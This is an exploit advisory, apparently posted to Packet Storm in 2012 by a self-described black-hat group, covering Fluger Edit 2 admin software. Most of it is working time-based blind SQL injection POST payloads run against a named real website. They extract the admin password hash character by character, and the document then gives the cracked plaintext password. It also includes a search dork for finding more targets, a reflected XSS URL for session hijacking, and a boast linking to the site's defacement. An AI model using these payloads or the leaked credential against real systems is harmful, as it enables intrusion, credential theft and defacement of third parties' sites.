Fluger Edit 2 Blind SQL Injection / Cross Site Scripting

2012-09-02T00:00:00
ID PACKETSTORM:116185
Type packetstorm
Reporter Akastep
Modified 2012-09-02T00:00:00

Description

                                        
                                            `=====================================================  
Vulnerable Software: Fluger Edit v.2 || administration software  
Vendor: http://www.fluger.com/  
Software License: Commercial  
Vulnerabilities: Blind SQL Injection And XSS  
Tested: In Wild  
=====================================================  
  
  
Dork :  
Designed and developed by Fluger IT  
All right reserved © | 2004 - 2012  
  
************** FOR OUR BRO RAMIL SEFEROV! ************************  
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*  
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=  
********************** REALLY! ********************************************  
******************ENJOY MAXIMALLY**************************************  
  
  
======================================================  
FULLY disclosured Real Exploitation examples:  
GPC MUST BE=OFF  
  
Theris Blind SQLi vulnerability on login page:  
  
http://www.artclima.am/edit/ <===(Admin panel)  
  
  
Vulnerable scenario is exist here: http://www.artclima.am/edit/config_secure/verify.php  
  
(Sorry i have no access to source code)  
  
CMS looks like: http://s61.radikal.ru/i172/1209/29/bb88e6891edf.png  
  
Due authentication mechanism you can't bypass login form by sending:  
'or''='  
  
Instead of you can use Time Based Way to obtain logins:password from admin table.  
Here we go:  
  
Print screens: http://s010.radikal.ru/i314/1209/32/9dae8ab77a3d.png  
  
  
  
  
http://www.artclima.am/edit/index.php?error  
  
  
Headers:  
  
Host: www.artclima.am  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Cookie: PHPSESSID=:$  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 28  
  
  
  
POST DATA:  
  
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
*REPLAY*  
  
  
loginde Blind varidir.  
Bypass getmir.  
  
Time Based RuleZ!  
  
www.artclima.am/edit/index.php?error  
  
columnlar:  
  
user  
password  
  
  
table: admin  
  
  
  
  
=========================================  
  
1 user var:  
  
//TRUE  
username=' or (select if(count(*)='1',sleep(30),0) from admin)-- and 5='5&password=sikdir  
  
cekek logini  
  
  
login: admin  
  
  
//TRUE  
  
username=' or (select if(user='admin',sleep(30),0) from admin)-- and 5='5&password=sikdir  
  
  
  
parolu cekek:  
  
  
=========================================  
1-ci simvol: e  
  
username=' or (select if(substr(password,1,1)='e',sleep(30),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
2-ci simvol: 0  
  
username=' or (select if(substr(password,2,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
3-cu simvol: 4  
  
username=' or (select if(substr(password,3,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
4-cu simvol: 4  
  
username=' or (select if(substr(password,4,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
5-ci simvol: 6  
  
username=' or (select if(substr(password,5,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
6-ci simvol: 5  
  
username=' or (select if(substr(password,6,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
7-ci simvol: 0  
  
username=' or (select if(substr(password,7,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
8-ci simvol: a  
  
username=' or (select if(substr(password,8,1)='a',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
9-cu simvol: 5  
  
username=' or (select if(substr(password,9,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
=========================================  
  
10-cu simvol: 6  
  
username=' or (select if(substr(password,10,1)='6',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
11-ci simvol: 7  
  
username=' or (select if(substr(password,11,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
12-ci simvol: e  
  
username=' or (select if(substr(password,12,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
13-cu simvol: d  
  
username=' or (select if(substr(password,13,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
yoxla sonra  
  
=========================================  
14-cu simvol: 2  
  
username=' or (select if(substr(password,14,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
15-ci simvol: b  
  
  
username=' or (select if(substr(password,15,1)='b',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
16-ci simvol: 2  
  
username=' or (select if(substr(password,16,1)='2',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
  
17-ci simvol: d  
  
username=' or (select if(substr(password,17,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
=========================================  
18-ci simvol: 0  
  
username=' or (select if(substr(password,18,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
19-cu simvol: 4  
  
username=' or (select if(substr(password,19,1)='4',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
20-ci simvol: 3  
  
username=' or (select if(substr(password,20,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
21-ci simvol: 0  
  
username=' or (select if(substr(password,21,1)='0',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
22-ci simvol: 3  
  
username=' or (select if(substr(password,22,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
=========================================  
  
23-cu simvol: e  
  
username=' or (select if(substr(password,23,1)='e',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
24-cu simvol: 3  
  
username=' or (select if(substr(password,24,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
25-ci simvol: 7  
  
username=' or (select if(substr(password,25,1)='7',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
26-ci simvol: 9  
  
username=' or (select if(substr(password,26,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
27-ci simvol: 3  
  
username=' or (select if(substr(password,27,1)='3',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
28-ci simvol: d  
  
  
username=' or (select if(substr(password,28,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
29-cu simvol: f  
  
username=' or (select if(substr(password,29,1)='f',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
30-cu simvol: d  
  
username=' or (select if(substr(password,30,1)='d',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
31-ci simvol: 9  
  
username=' or (select if(substr(password,31,1)='9',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
  
=========================================  
  
32-ci simvol: 5  
  
username=' or (select if(substr(password,32,1)='5',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
=========================================  
  
  
Verification: +  
  
  
//TRUE  
username=' or (select if(substr(password,1,33)='e044650a567ed2b2d04303e3793dfd95',sleep(60),0) from admin limit 1)-- and 5='5&password=sikdir  
  
MD5: e044650a567ed2b2d04303e3793dfd95  
  
Resolves to: price777  
  
Sure! I will "rm"-it too with great pleasure!  
  
Rmned: http://zone-h.org/mirror/id/18295382  
  
  
  
  
  
Second way: Session Hijack to gain access to admin panel:  
  
XSS:  
http://www.artclima.am/edit/admin.php?page=news_admin/news&type=25&type_name=Title%20Ptoduct%3Cscript%3Ealert%28%22OwnEd%20By%20AkaStep%22%29;%3C/script%3E&type_admin=Catalog&empty_sess=1  
  
  
Print Screen:  
http://s61.radikal.ru/i173/1209/26/8f9f482ff32d.png  
  
  
  
  
  
From source code of page:  
  
  
  
  
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="h350">  
<tr valign="top">  
<td class="bg_content">  
<div id="printarea">  
<table cellpadding="0" cellspacing="0" border="0" summary="" style="height: 24px;" width="100%" class="tabfree">  
<tr>  
<td class="tabcurrent">Title Ptoduct<script>alert("OwnEd By AkaStep");</script></td>  
<td> </td>  
</tr>  
</table>  
<table width="100%" cellpadding="5" cellspacing="1" border="0" summary="" class="boxborder" >  
  
  
  
==========================THE END=========================  
  
  
  
  
  
  
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:  
===========================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all AA Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3.*  
===========================================================  
  
/AkaStep  
  
  
02.09.2012  
  
  
  
  
  
`